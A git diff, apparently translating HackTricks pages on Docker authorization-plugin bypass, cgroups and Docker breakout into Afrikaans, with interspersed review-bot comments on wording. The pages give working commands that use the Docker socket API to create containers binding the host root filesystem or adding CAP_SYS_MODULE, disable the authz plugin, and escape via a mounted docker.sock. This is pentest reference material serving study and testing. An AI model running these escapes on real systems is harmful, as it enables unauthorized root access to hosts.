d 2>/dev/null` +Let daarop dat jy dalk nie die `/tmp`-vouer kan koppel nie, maar jy kan 'n **ander skryfbare vouer** koppel. 
Jy kan skryfbare gidslys vind deur die volgende te gebruik: `find / -writable -type d 2>/dev/null` -**Note that not all the directories in a linux machine will support the suid bit!** In order to check which directories support the suid bit run `mount | grep -v "nosuid"` For example usually `/dev/shm` , `/run` , `/proc` , `/sys/fs/cgroup` and `/var/lib/lxcfs` don't support the suid bit. +**Let daarop dat nie alle gidslysies in 'n Linux-masjien die suid-bit sal ondersteun nie!** Om te bepaal watter gidslysies die suid-bit ondersteun, voer jy `mount | grep -v "nosuid"` uit. Byvoorbeeld, gewoonlik ondersteun `/dev/shm`, `/run`, `/proc`, `/sys/fs/cgroup` en `/var/lib/lxcfs` nie die suid-bit nie. -Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`) +Let ook daarop dat as jy `/etc` of enige ander vouer **wat konfigurasie-lêers bevat** kan koppel, jy dit as root vanuit die Docker-houer kan wysig om **privileges te verhoog** (dalk deur `/etc/shadow` te wysig). {% endhint %} -## Unchecked API Endpoint +## Ongekontroleerde API-eindpunt -The responsibility of the sysadmin configuring this plugin would be to control which actions and with which privileges each user can perform. Therefore, if the admin takes a **blacklist** approach with the endpoints and the attributes he might **forget some of them** that could allow an attacker to **escalate privileges.** +Die verantwoordelikheid van die stelseladministrateur wat hierdie invoegtoepassing konfigureer, sou wees om te beheer watter aksies en met watter bevoegdhede elke gebruiker kan uitvoer. Daarom, as die administrateur 'n **swartlys**-benadering volg met die eindpunte en die eienskappe, kan hy dalk sommige daarvan **vergeet** wat 'n aanvaller in staat sou stel om **privileges te verhoog**. 
-You can check the docker API in [https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#) +Jy kan die Docker API nagaan by [https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#) -## Unchecked JSON Structure +## Ongekontroleerde JSON-Struktuur -### Binds in root - -It's possible that when the sysadmin configured the docker firewall he **forgot about some important parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Binds**".\ -In the following example it's possible to abuse this misconfiguration to create and run a container that mounts the root (/) folder of the host: +### Bind in die wortel +Dit is moontlik dat die stelseladministrateur, toe hy die Docker-firewall gekonfigureer het, 'n belangrike parameter van die [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) soos "**Binds**" **vergeet** het.\ +In die volgende voorbeeld is dit moontlik om van hierdie konfigurasiefout gebruik te maak om 'n houer te skep en uit te voer wat die wortel (/) vouer van die gasheer koppel: ```bash docker version #First, find the API version of docker, 1.40 in this example docker images #List the images available 
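Review bot: in the "Monteer Skryfbare Vouer" code block the continuation line lost its indentation (`-    -p #This will give you a shell as root` became `+-p #This will give you a shell as root`), so the quoted session no longer reads as `/tmp/bash -p` wrapped over two lines; keep the original spacing. The hint text in this hunk mixes "vouer", "gids" and "gidslysies" for folder/directory and "monteer"/"koppel" for mount, and leaves "privileges" in English where the rest of the patch uses "voorregte"/"bevoegdhede"; pick one term for each. The `/etc` sentence also drops "abuse them in the host" from the source, so the point that the edited configuration files take effect on the host is lost; suggest "...om dit op die gasheer te misbruik en voorregte te verhoog (dalk deur `/etc/shadow` te wysig)".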
@@ -142,39 +131,31 @@ docker start f6932bc153ad #Start the created privileged container docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it #You can access the host filesystem ``` - {% hint style="warning" %} -Note how in this example we are using the **`Binds`** param as a root level key in the JSON but in the API it appears under the key **`HostConfig`** +Let daarop hoe ons in hierdie voorbeeld die **`Binds`** param gebruik as 'n sleutel op die hoofvlak in die JSON, maar in die API verskyn dit onder die sleutel **`HostConfig`** {% endhint %} ### Binds in HostConfig -Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: - +Volg dieselfde instruksies soos met **Binds in root** deur hierdie **versoek** na die Docker API te doen: ```bash curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Binds":["/:/host"]}}' http:/v1.40/containers/create ``` +### Monteerings in die wortel -### Mounts in root - -Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: - +Volg dieselfde instruksies soos met **Bind in die wortel** deur hierdie **versoek** na die Docker API uit te voer: ```bash curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}' http:/v1.40/containers/create ``` +### Monteer in HostConfig -### Mounts in HostConfig - -Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: - +Volg dieselfde instruksies soos met **Binds in root** deur hierdie **versoek** na die Docker API te doen: ```bash curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "HostConfig":{"Mounts": 
[{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}}' http:/v1.40/containers/cre ``` +## Ongekontroleerde JSON-attribuut -## Unchecked JSON Attribute - -It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS\_MODULE** capability: - +Dit is moontlik dat toe die stelseladministrateur die docker-firewall gekonfigureer het, hy **vergeet het van 'n belangrike attribuut van 'n parameter** van die [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) soos "**Capabilities**" binne "**HostConfig**". In die volgende voorbeeld is dit moontlik om van hierdie verkeerde konfigurasie misbruik te maak om 'n houer met die **SYS\_MODULE**-vermoë te skep en uit te voer: ```bash docker version curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Capabilities":["CAP_SYS_MODULE"]}}' http:/v1.40/containers/create 
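Review bot: the cross-references no longer match the headings: the preceding hunk renamed `### Binds in root` to `### Bind in die wortel`, yet two of the three "Volg dieselfde instruksies soos met **Binds in root**" sentences in this hunk still use the English heading name and only one says "**Bind in die wortel**". The sibling headings are inconsistent as well: `### Monteerings in die wortel`, `### Monteer in HostConfig` and an untranslated `### Binds in HostConfig`. Suggest keeping the JSON key names as-is ("### Binds in die wortel", "### Mounts in die wortel", "### Mounts in HostConfig") and pointing all three references at the same heading text.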
@@ -184,15 +165,13 @@ docker exec -it c52a77629a91 bash capsh --print #You can abuse the SYS_MODULE capability ``` - {% hint style="info" %} -The **`HostConfig`** is the key that usually contains the **interesting** **privileges** to escape from the container. However, as we have discussed previously, note how using Binds outside of it also works and may allow you to bypass restrictions. +Die **`HostConfig`** is die sleutel wat gewoonlik die **interessante** **voorregte** bevat om uit die houer te ontsnap. Let egter daarop dat die gebruik van Binds buite dit ook werk en jou mag toelaat om beperkings te omseil. {% endhint %} -## Disabling Plugin - -If the **sysadmin** **forgotten** to **forbid** the ability to **disable** the **plugin**, you can take advantage of this to completely disable it! +## Plugin Deaktivering +As die **sysadmin** die vermoë om die **plugin** te **deaktiveer** vergeet het, kan jy hiervan gebruik maak om dit heeltemal te deaktiveer! ```bash docker plugin list #Enumerate plugins @@ -204,30 +183,27 @@ docker plugin disable authobot docker run --rm -it --privileged -v /:/host ubuntu bash docker plugin enable authobot ``` - -Remember to **re-enable the plugin after escalating**, or a **restart of docker service won’t work**! +Onthou om die invoegtoepassing **weer te aktiveer nadat jy toegang verkry het**, anders sal 'n **herlaai van die docker-diens nie werk nie**! ## Auth Plugin Bypass writeups * [https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/) -## References +## Verwysings * [https://docs.docker.com/engine/extend/plugins\_authorization/](https://docs.docker.com/engine/extend/plugins\_authorization/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
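Review bot: the `## Plugin Deaktivering` paragraph drops the verb "forbid": "If the sysadmin forgot to forbid the ability to disable the plugin" became "As die **sysadmin** die vermoë om die **plugin** te **deaktiveer** vergeet het", which says the admin forgot the ability rather than forgot to forbid it; suggest "As die sysadmin vergeet het om die vermoë om die plugin te deaktiveer te verbied". In the following hunk "re-enable the plugin after escalating" became "weer te aktiveer nadat jy toegang verkry het" (after gaining access), and "invoegtoepassing" is used for plugin where the rest of the file keeps "plugin". The `## Auth Plugin Bypass writeups` heading is left in English while `## References` was translated to `## Verwysings`, and the `HostConfig` hint drops "as we have discussed previously", which tied it back to the "Binds in root" section.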
- - diff --git a/linux-hardening/privilege-escalation/docker-security/cgroups.md b/linux-hardening/privilege-escalation/docker-security/cgroups.md index bfed62d90..2d12581cb 100644 --- a/linux-hardening/privilege-escalation/docker-security/cgroups.md +++ b/linux-hardening/privilege-escalation/docker-security/cgroups.md @@ -2,30 +2,29 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Linux Control Groups**, or **cgroups**, are a feature of the Linux kernel that allows the allocation, limitation, and prioritization of system resources like CPU, memory, and disk I/O among process groups. They offer a mechanism for **managing and isolating the resource usage** of process collections, beneficial for purposes such as resource limitation, workload isolation, and resource prioritization among different process groups. +**Linux-beheergroepe**, of **cgroups**, is 'n kenmerk van die Linux-kernel wat die toekenning, beperking en prioritisering van stelselhulpbronne soos CPU, geheue en skyf-I/O aan prosesgroepe moontlik maak. Dit bied 'n meganisme vir die **bestuur en isolering van die hulpbronverbruik** van prosesversamelings, wat voordelig is vir doeleindes soos hulpbronbeperking, werklastisolering en hulpbronprioritisering tussen verskillende prosesgroepe. -There are **two versions of cgroups**: version 1 and version 2. Both can be used concurrently on a system. The primary distinction is that **cgroups version 2** introduces a **hierarchical, tree-like structure**, enabling more nuanced and detailed resource distribution among process groups. Additionally, version 2 brings various enhancements, including: +Daar is **twee weergawes van cgroups**: weergawe 1 en weergawe 2. Beide kan gelyktydig op 'n stelsel gebruik word. Die primêre onderskeid is dat **cgroups weergawe 2** 'n **hiërargiese, boomagtige struktuur** inbring wat meer genuanseerde en gedetailleerde hulpbronverspreiding tussen prosesgroepe moontlik maak. Daarbenewens bring weergawe 2 verskeie verbeterings, insluitend: -In addition to the new hierarchical organization, cgroups version 2 also introduced **several other changes and improvements**, such as support for **new resource controllers**, better support for legacy applications, and improved performance. 
+Naas die nuwe hiërargiese organisasie het cgroups weergawe 2 ook **verskeie ander veranderinge en verbeterings** ingevoer, soos ondersteuning vir **nuwe hulpbronbeheerders**, beter ondersteuning vir oudtydse toepassings en verbeterde prestasie. -Overall, cgroups **version 2 offers more features and better performance** than version 1, but the latter may still be used in certain scenarios where compatibility with older systems is a concern. - -You can list the v1 and v2 cgroups for any process by looking at its cgroup file in /proc/\. You can start by looking at your shell’s cgroups with this command: +Oor die algemeen bied cgroups **weergawe 2 meer funksies en beter prestasie** as weergawe 1, maar laasgenoemde kan steeds in sekere scenario's gebruik word waar verenigbaarheid met oudere stelsels 'n oorweging is. +Jy kan die v1- en v2-cgroups vir enige proses lys deur na sy cgroup-lêer in /proc/\ te kyk. Jy kan begin deur na jou skel se cgroups te kyk met hierdie opdrag: ```shell-session $ cat /proc/self/cgroup 12:rdma:/ 
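Review bot: the process-id placeholder is still missing from the path in the new line `deur na sy cgroup-lêer in /proc/\ te kyk`: the backslash escapes nothing, so the rendered text shows `/proc/\` instead of the per-process `/proc/<pid>/cgroup` file the sentence is describing. The removed English line carries the same defect, so this translation is the place to restore the placeholder (with the markdown escaping the book uses) rather than carry the broken path over. In the same hunk "shell" is rendered as `skel` (`jou skel se cgroups`) but as `skulp` in the next hunk (`'n skulp se cgroup-konfigurasie`); settle on one term for the file.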
@@ -40,75 +39,67 @@ $ cat /proc/self/cgroup 1:name=systemd:/user.slice/user-1000.slice/session-2.scope 0::/user.slice/user-1000.slice/session-2.scope ``` +Die uitsetstruktuur is as volg: -The output structure is as follows: +- **Nommers 2-12**: cgroups v1, met elke lyn wat 'n verskillende cgroup verteenwoordig. Kontroleerders vir hierdie cgroups word langs die nommer gespesifiseer. +- **Nommer 1**: Ook cgroups v1, maar slegs vir bestuursdoeleindes (deur bv. systemd ingestel), en het nie 'n kontroleerder nie. +- **Nommer 0**: Verteenwoordig cgroups v2. Geen kontroleerders word gelys nie, en hierdie lyn is eksklusief vir stelsels wat slegs cgroups v2 gebruik. +- Die **name is hiërargies**, soos lêerpaadjies, wat die struktuur en verhouding tussen verskillende cgroups aandui. +- **Name soos /user.slice of /system.slice** spesifiseer die kategorisering van cgroups, met user.slice tipies vir aanmeldsessies wat deur systemd bestuur word en system.slice vir stelseldienste. -- **Numbers 2–12**: cgroups v1, with each line representing a different cgroup. Controllers for these are specified adjacent to the number. -- **Number 1**: Also cgroups v1, but solely for management purposes (set by, e.g., systemd), and lacks a controller. -- **Number 0**: Represents cgroups v2. No controllers are listed, and this line is exclusive on systems only running cgroups v2. -- The **names are hierarchical**, resembling file paths, indicating the structure and relationship between different cgroups. -- **Names like /user.slice or /system.slice** specify the categorization of cgroups, with user.slice typically for login sessions managed by systemd and system.slice for system services. +### Sien cgroups -### Viewing cgroups +Die lêersisteem word tipies gebruik om toegang tot **cgroups** te verkry, wat afwyk van die Unix-stelseloproepkoppelvlak wat tradisioneel gebruik word vir kernelinteraksies. 
Om 'n skulp se cgroup-konfigurasie te ondersoek, moet jy die **/proc/self/cgroup**-lêer ondersoek, wat die skulp se cgroup onthul. Daarna kan jy deur na die **/sys/fs/cgroup** (of **`/sys/fs/cgroup/unified`**) gids te navigeer en 'n gids te vind wat die naam van die cgroup deel, verskeie instellings en hulpbronverbruiksinligting wat relevant is vir die cgroup, waarneem. -The filesystem is typically utilized for accessing **cgroups**, diverging from the Unix system call interface traditionally used for kernel interactions. To investigate a shell's cgroup configuration, one should examine the **/proc/self/cgroup** file, which reveals the shell's cgroup. Then, by navigating to the **/sys/fs/cgroup** (or **`/sys/fs/cgroup/unified`**) directory and locating a directory that shares the cgroup's name, one can observe various settings and resource usage information pertinent to the cgroup. +![Cgroup-lêersisteem](../../../.gitbook/assets/image%20(10)%20(2)%20(2).png) -![Cgroup Filesystem](../../../.gitbook/assets/image%20(10)%20(2)%20(2).png) - -The key interface files for cgroups are prefixed with **cgroup**. The **cgroup.procs** file, which can be viewed with standard commands like cat, lists the processes within the cgroup. Another file, **cgroup.threads**, includes thread information. +Die sleutelkoppelvlaklêers vir cgroups het die voorvoegsel **cgroup**. Die **cgroup.procs**-lêer, wat met standaardopdragte soos cat bekyk kan word, lys die prosesse binne die cgroup. 'n Ander lêer, **cgroup.threads**, bevat draadinligting. ![Cgroup Procs](../../../.gitbook/assets/image%20(1)%20(1)%20(5).png) -Cgroups managing shells typically encompass two controllers that regulate memory usage and process count. To interact with a controller, files bearing the controller's prefix should be consulted. For instance, **pids.current** would be referenced to ascertain the count of threads in the cgroup. 
+Cgroups wat skulpe bestuur, omvat tipies twee kontroleerders wat geheugengebruik en prosessetelling reguleer. Om met 'n kontroleerder te kommunikeer, moet lêers met die voorvoegsel van die kontroleerder geraadpleeg word. Byvoorbeeld, **pids.current** sal geraadpleeg word om die telling van drade in die cgroup te bepaal. -![Cgroup Memory](../../../.gitbook/assets/image%20(3)%20(5).png) +![Cgroup-geheue](../../../.gitbook/assets/image%20(3)%20(5).png) -The indication of **max** in a value suggests the absence of a specific limit for the cgroup. However, due to the hierarchical nature of cgroups, limits might be imposed by a cgroup at a lower level in the directory hierarchy. +Die aanduiding van **max** in 'n waarde dui op die afwesigheid van 'n spesifieke limiet vir die cgroup. Tog, as gevolg van die hiërargiese aard van cgroups, kan limiete opgelê word deur 'n cgroup op 'n laer vlak in die gidshiërargie. +### Manipulering en Skepping van cgroups -### Manipulating and Creating cgroups - -Processes are assigned to cgroups by **writing their Process ID (PID) to the `cgroup.procs` file**. This requires root privileges. For instance, to add a process: - +Prosesse word aan cgroups toegewys deur **hul Proses-ID (PID) na die `cgroup.procs`-lêer te skryf**. Dit vereis root-voorregte. Byvoorbeeld, om 'n proses by te voeg: ```bash echo [pid] > cgroup.procs ``` - -Similarly, **modifying cgroup attributes, like setting a PID limit**, is done by writing the desired value to the relevant file. To set a maximum of 3,000 PIDs for a cgroup: - +Op soortgelyke wyse word **cgroup-eienskappe gewysig, soos die instelling van 'n PID-limiet**, deur die gewenste waarde na die betrokke lêer te skryf. Om 'n maksimum van 3,000 PIDs vir 'n cgroup in te stel: ```bash echo 3000 > pids.max ``` +**Die skep van nuwe cgroups** behels die skep van 'n nuwe subgids binne die cgroup-hierargie, wat die kernel aanmoedig om outomaties die nodige interfeeslêers te genereer. 
Alhoewel cgroups sonder aktiewe prosesse met `rmdir` verwyder kan word, moet daar bewus wees van sekere beperkings: -**Creating new cgroups** involves making a new subdirectory within the cgroup hierarchy, which prompts the kernel to automatically generate necessary interface files. Though cgroups without active processes can be removed with `rmdir`, be aware of certain constraints: - -- **Processes can only be placed in leaf cgroups** (i.e., the most nested ones in a hierarchy). -- **A cgroup cannot possess a controller absent in its parent**. -- **Controllers for child cgroups must be explicitly declared** in the `cgroup.subtree_control` file. For example, to enable CPU and PID controllers in a child cgroup: - +- **Prosesse kan slegs in blaar-cgroups geplaas word** (d.w.s. die mees geneste in 'n hiërargie). +- **'n Cgroup kan nie 'n beheerder besit wat afwesig is in sy ouer nie**. +- **Beheerders vir kind-cgroups moet eksplisiet verklaar word** in die `cgroup.subtree_control`-lêer. Byvoorbeeld, om die CPU- en PID-beheerders in 'n kind-cgroup te aktiveer: ```bash echo "+cpu +pids" > cgroup.subtree_control ``` +Die **root cgroup** is 'n uitsondering op hierdie reëls en maak direkte prosesplasing moontlik. Dit kan gebruik word om prosesse uit systemd-bestuur te verwyder. -The **root cgroup** is an exception to these rules, allowing direct process placement. This can be used to remove processes from systemd management. +**Monitering van CPU-gebruik** binne 'n cgroup is moontlik deur die `cpu.stat` lêer, wat die totale CPU-tyd wat verbruik is, vertoon. Dit is nuttig om gebruik oor 'n diens se subprosesse te volg: -**Monitoring CPU usage** within a cgroup is possible through the `cpu.stat` file, displaying total CPU time consumed, helpful for tracking usage across a service's subprocesses: +
CPU-gebruikstatistieke soos vertoon in die cpu.stat lêer
-
CPU usage statistics as shown in the cpu.stat file
- -## References -* **Book: How Linux Works, 3rd Edition: What Every Superuser Should Know By Brian Ward** +## Verwysings +* **Boek: How Linux Works, 3rd Edition: What Every Superuser Should Know deur Brian Ward**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
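Review bot: "controller" is translated two different ways inside this hunk: `Kontroleerders vir hierdie cgroups`, `het nie 'n kontroleerder nie` and `twee kontroleerders wat geheugengebruik` in the first half, then `'n Cgroup kan nie 'n beheerder besit` and `Beheerders vir kind-cgroups` in the constraints list. Either word is fine, but use one throughout. The closing banner also drifts from the opening banner of the same file (`hacktruuks` / `github-repos` at the top, `hacking-truuks` / `github-opslag` at the bottom). Finally, the hunk removes the blank lines that separated prose from the ```bash fences (for example before `echo [pid] > cgroup.procs` and `echo 3000 > pids.max`); that is unrelated whitespace churn in a translation commit and should be left as in the source.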
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md index 0766cc0dc..ea37e216f 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md @@ -1,48 +1,45 @@ -# Docker Breakout / Privilege Escalation +# Docker Uitbreek / Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **werkstrome outomatiseer** met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Automatic Enumeration & Escape +## Outomatiese Opsomming & Ontsnapping -* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers** -* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): This tool is pretty **useful to enumerate the container you are into even try to escape automatically** -* [**amicontained**](https://github.com/genuinetools/amicontained): Useful tool to get the privileges the container has in order to find ways to escape from it -* [**deepce**](https://github.com/stealthcopter/deepce): Tool to enumerate and escape from containers -* [**grype**](https://github.com/anchore/grype): Get the CVEs contained in the software installed in the image +* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): Dit kan ook **houers opsom** +* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): Hierdie instrument is baie **nuttig om die houer waarin jy is op te som, selfs om outomaties te probeer ontsnap** +* [**amicontained**](https://github.com/genuinetools/amicontained): Nuttige instrument om die voorregte van die houer te kry om maniere te vind om daaruit te ontsnap +* [**deepce**](https://github.com/stealthcopter/deepce): Instrument om houers op te som en daaruit te ontsnap +* [**grype**](https://github.com/anchore/grype): Kry die CVE's wat in die sagteware geïnstalleer 
in die beeld bevat word -## Mounted Docker Socket Escape - -If somehow you find that the **docker socket is mounted** inside the docker container, you will be able to escape from it.\ -This usually happen in docker containers that for some reason need to connect to docker daemon to perform actions. +## Ontsnapping van Gemoniteerde Docker-sokkel +As jy op een of ander manier vind dat die **docker-sokkel gemoniteer** is binne die docker-houer, sal jy daaruit kan ontsnap.\ +Dit gebeur gewoonlik in docker-houers wat om een of ander rede moet koppel aan die docker-daemon om aksies uit te voer. ```bash #Search the socket find / -name docker.sock 2>/dev/null #It's usually in /run/docker.sock ``` - -In this case you can use regular docker commands to communicate with the docker daemon: - +In hierdie geval kan jy gewone docker-opdragte gebruik om met die docker daemon te kommunikeer: ```bash #List images to use one docker images 
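Review bot: `gemoniteer` in the heading `## Ontsnapping van Gemoniteerde Docker-sokkel` and in `die **docker-sokkel gemoniteer** is` is the wrong verb for "mounted"; later hunks of this same file use `gemonteer` (`'n volume van die gasheer gemonteer het`), which is the correct form, so use it here as well. The socket is also called `sokkel` here but `sokket` in the next hunk (`docker sokket op 'n onverwagte plek`); pick one. The grype bullet has garbled word order too: `Kry die CVE's wat in die sagteware geïnstalleer in die beeld bevat word` should read along the lines of `Kry die CVE's in die sagteware wat in die beeld geïnstalleer is`.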
